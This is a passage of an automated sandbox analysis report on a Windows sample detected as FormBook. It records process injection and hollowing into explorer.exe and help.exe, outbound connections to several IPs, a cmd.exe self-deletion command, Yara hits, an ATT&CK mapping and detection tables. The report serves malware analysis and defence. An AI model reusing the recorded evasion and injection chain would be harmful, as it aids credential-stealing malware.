Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F23540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F78D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F2A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F78ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F5FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F70EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F246A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F5B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F5B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F78A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F34257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F5FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ECDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F253CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F253CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F75BA5 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 3.234.181.234 80
Source: C:\Windows\explorer.exe	Network Connect: 216.24.179.55 80
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe	Network Connect: 216.58.207.179 80

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3424

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\help.exe base address: 1390000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 1017008

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'

Source: explorer.exe, 00000003.00000000.677893363.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000000.678193254.0000000001080000.00000002.00000001.sdmp, help.exe, 00000006.00000002.1005535910.0000000004500000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.678193254.0000000001080000.00000002.00000001.sdmp, help.exe, 00000006.00000002.1005535910.0000000004500000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.678193254.0000000001080000.00000002.00000001.sdmp, help.exe, 00000006.00000002.1005535910.0000000004500000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.678193254.0000000001080000.00000002.00000001.sdmp, help.exe, 00000006.00000002.1005535910.0000000004500000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.691909669.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Queries volume information: C:\Users\user\Desktop\4NoiNHCNoU.exe VolumeInformation
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Rootkit1	Credential API Hooking1	Security Software Discovery121	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection812	Valid Accounts1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion3	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Disable or Modify Tools1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Deobfuscate/Decode Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Obfuscated Files or Information3	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Software Packing1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4NoiNHCNoU.exe	31%	Virustotal		Browse
4NoiNHCNoU.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
4NoiNHCNoU.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.monalizacos.com	0%	Virustotal		Browse
ghs.googlehosted.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj$	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://ns.adobe.c/g$	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://www.namebrightstatic.com/images/header_bg.png)	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
https://www.namebrightstatic.com/images/bg.png)	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
https://www.namebrightstatic.com/images/site_maintenance.png)	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/logo_off.gif)	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://ns.ado/1$	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://ns.adb	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
